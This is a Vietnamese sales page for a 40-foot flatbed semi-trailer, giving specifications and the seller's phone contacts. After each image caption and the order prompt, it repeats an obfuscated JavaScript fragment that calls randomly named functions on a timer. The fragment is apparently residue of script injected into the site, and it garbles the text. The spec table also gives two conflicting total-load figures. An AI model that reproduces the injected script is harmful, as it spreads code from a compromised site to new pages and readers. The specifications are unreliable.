SƠMI-ROMOOC SÀN BỬNG 40 FEET

SOMI-ROMOOC-SAN-BUNG-40FEET-02

THÔNG SỐ KỸ THUẬT CỦA SOMI-ROMOOC SÀN BỬNG 40 FEET

THÔNG SỐ VÀ KÍCH THƯỚC

Kích thước tổng thểmm12.400 mm x 2.500 mm x 3450 mm
Tự trọngkg8.500
Tổng Tải trọngkg31.500
Tổng tải trọngkg30,400
Dầm chínhmm500
Hệ thống treokg39.000nhíp 7 lá
Trụckg3 x 13.000Fuwa
Hệ thống phanhphanh hơi dây kép
Chân chốngkg28.000Fuwa
Vỏ 11.00-20Double coin

HÌNH ẢNH SOMI-ROMOOC SÀN BỬNG 40 FEET

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}SOMI-ROMOOC-SAN-BUNG-40FEET

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}SOMI-ROMOOC-SAN-BUNG-40FEET-02

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}SƠMI-ROMOOC SÀN BỬNG 40FEET 03

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}SOMI-ROMOOC SÀN BỬNG 40 FEET 04

andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET 1 andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}CHI TIET 2

 


LIÊN HỆ VỚI CHÚNG TÔI ĐỂ ĐẶT HÀNGandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

Phòng Kinh doanh rơ-mooc TRƯƠNG THANH  :(0650) 3786561
Mr. Thanh : (090) 82 80 555    /    Mr. Trưởng: (090) 811 22 50